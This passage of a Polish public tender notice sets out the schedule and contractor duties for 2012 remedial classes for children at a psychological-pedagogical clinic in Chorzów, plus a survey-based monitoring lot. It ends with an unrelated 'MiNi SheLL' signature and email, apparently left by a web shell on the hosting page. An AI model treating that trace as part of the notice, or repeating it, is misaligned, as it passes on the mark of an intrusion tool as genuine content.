4)	Wyćwiczenie podstawowych umiejętności dydaktycznych (czytania, pisania i liczenia);
5)	Wzmocnienie poczucia własnej wartości i minimalizowanie negatywnych emocjonalnych skutków niepowodzeń szkolnych.

4.	Wspólny słownik zamówienia CPV:
80410000-1 - Różne usługi szkolne

5.	Termin realizacji: od podpisania umowy poprzetargowej do dnia 31.12.2012 r.

6.	Realizacja zajęć specjalistycznych odbędzie się na terenie Poradni Psychologiczno - Pedagogicznej przy ul. Pawła 11 w Chorzowie w następujących terminach:
1)	II.2012 r., dzień miesiąca: 23, 24, godziny: 8.00-10.00, 14.00-16.00, 16.15-18.15; dzień miesiąca: 27, godziny: 14.00-16.00, 16.15-18.15;
2)	III.2012 r., dzień miesiąca: 08, 09, 15, 22, 23, 29, 30, godziny: 8.00-10.00, 14.00-16.00, 16.15-18.15; dzień miesiąca: 05, 12, 16, 19, 26, godziny: 14.00-16.00, 16.15-18.15;
3)	IV.2012 r., dzień miesiąca: 12, 13, 19, 20, 26, 27, godziny: 8.00-10.00, 14.00-16.00, 16.15-18.15; dzień miesiąca: 16, 23, godziny: 14.00-16.00, 16.15-18.15
4)	V.2012 r., dzień miesiąca: 10, 11, 17, 18, 24, 25, 31, godziny: 8.00-10.00, 14.00-16.00, 16.15-18.15; dni miesiąca: 07, 14, 21, 28, godziny: 14.00-16.00, 16.15-18.15;
5)	VI.2012 r., dzień miesiąca: 01, godziny: 8.00-10.00, dzień miesiąca: 11, godziny: 14.00-16.00, 16.15-18.15; dzień miesiąca: 14, 15, godziny: 8.00-10.00, 14.00-16.00, 16.15-18.15;

7.	Wykonawca zobowiązany jest:
1)	Przeprowadzić test sprawdzający umiejętności dzieci /własne opracowanie/;
2)	prowadzić listy obecności na zajęciach w formie papierowej i skanowanej na płytce CD;
3)	prowadzić dokumentację zajęć w formie dzienników zajęć, w których będą zamieszczone tematy i cel zajęć, konspekt zajęć, stosowane metody pracy w formie papierowej i skanowanej na płytce CD;
4)	przygotować salę poprzez oznaczenie jej plakatem informującym o realizowanym projekcie (potwierdzenie na płytce CD).
Po zakończeniu spotkań należy dostarczyć w/w dokumentację Zamawiającemu w formie papierowej i skanowanej na płytce CD..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> monitorowanie zajęć specjalistycznych z dziećmi, warsztatów dla rodziców, nauczycieli, grupy wsparcia dla nauczycieli.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Opracowanie materiałów potrzebnych do przeprowadzenia monitoringu (ankiety dla nauczycieli, rodziców, test sprawdzający przyrost umiejętności dydaktycznych u dzieci uczestniczących w zajęciach specjalistycznych) w formie papierowej i skanowanej na płytce CD.
2.	Rozprowadzenie materiałów wśród uczestników.
3.	Opracowanie zebranych wyników w formie papierowej i skanowanej na płytce CD.
4.	Wspólny słownik zamówienia CPV:
79311200-9 - Usługi przeprowadzania badań ankietowych
5.	Termin realizacji: czerwiec 2012 r., grudzień 2012 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.31.12.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com